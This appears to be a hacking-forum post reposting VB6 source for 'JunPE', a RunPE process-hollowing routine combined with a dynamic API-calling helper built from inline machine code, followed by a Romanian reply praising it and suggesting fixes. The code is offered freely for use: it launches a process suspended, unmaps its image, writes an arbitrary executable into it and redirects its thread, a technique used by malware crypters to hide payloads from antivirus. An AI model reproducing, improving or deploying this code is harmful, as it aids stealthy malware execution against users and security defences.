[VB6] RunPe + CallApiByName (JunPE)

[Nytro]

[VB6] RunPe + CallApiByName (JunPE)

Product: JunPE

Description: RunPe + CallApiByName

Author: Jhonjhon_123 - [J.J.G.P]

Option Explicit
' ****************************************************************************************************************************** '
'
' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Descripción: RunPe + CallApiByName
' --- Distribución: Libre
' --- Terminos De Uso:
'   --- Prohibida su comercialización.
'   --- No Debe eliminar los creditos.
'
' --- Funciones:
'   --- IniciarDDLL()
'	   - Inicializa la configuración
'
'   --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
'	   - RunPE
'	   * sName: Ruta al exe
'	   * bBytes: Bytes a ejecutar
'
' ****************************************************************************************************************************** '
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Dim bMoveMem(36) As Byte
Public Sub IniciarDDLL()
Dim vTMP As Variant
Dim D As Long
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next
Dim lPtr				As Long
Dim bvASM(&HEC00& - 1)  As Byte
Dim i				   As Long
Dim lMod				As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4:			  lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2:				  lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1:				lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4:	 lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1:					lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4:		 lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1:					lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
On Error Resume Next
Dim bIdh(63)  As Byte ' IMAGE_DOS_HEADER
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS
Dim bIsh(39)  As Byte ' IMAGE_SECTION_HEADER
Dim bPi(15)   As Byte ' PROCESS_INFORMATION
Dim bSi(67)   As Byte ' STARTUPINFO
Dim bCtx(203) As Byte ' CONTEXT86
Dim e_lfanew As Long
Dim ImageBase As Long
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long
Dim NumberOfSections As Integer
Dim VirtualAddress As Long
Dim PointerToRawData As Long
Dim SizeOfRawData As Long
Dim Ebx As Long
Dim Eax As Long
Dim lTemp As Long
Dim D As Long
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
For D = 0 To NumberOfSections - 1
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
Next
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread)
End Sub

Sursa: RunPe + CallApiByName (JunPE)

[me.mello]

Ce e mai frumos decat MoveMemory si CopyMemory:X super deja am idei de a imbunatati ExecuteBytes , ai postat si ceva de genu in c++ daca nu ma insel.

Cam sacadeaza functia...nu vad ZeroMemory sau CloseHandle la hProcess sau hThread dar probabil a facut el versiunea standard, cand lucrezi cu astfel de functii le mai dai si free la urma, MoveMemory e o functie destul de volatila mai ales in vb.

Oricum e super functia, e altceva fata de ce mai vazusem prin trecut.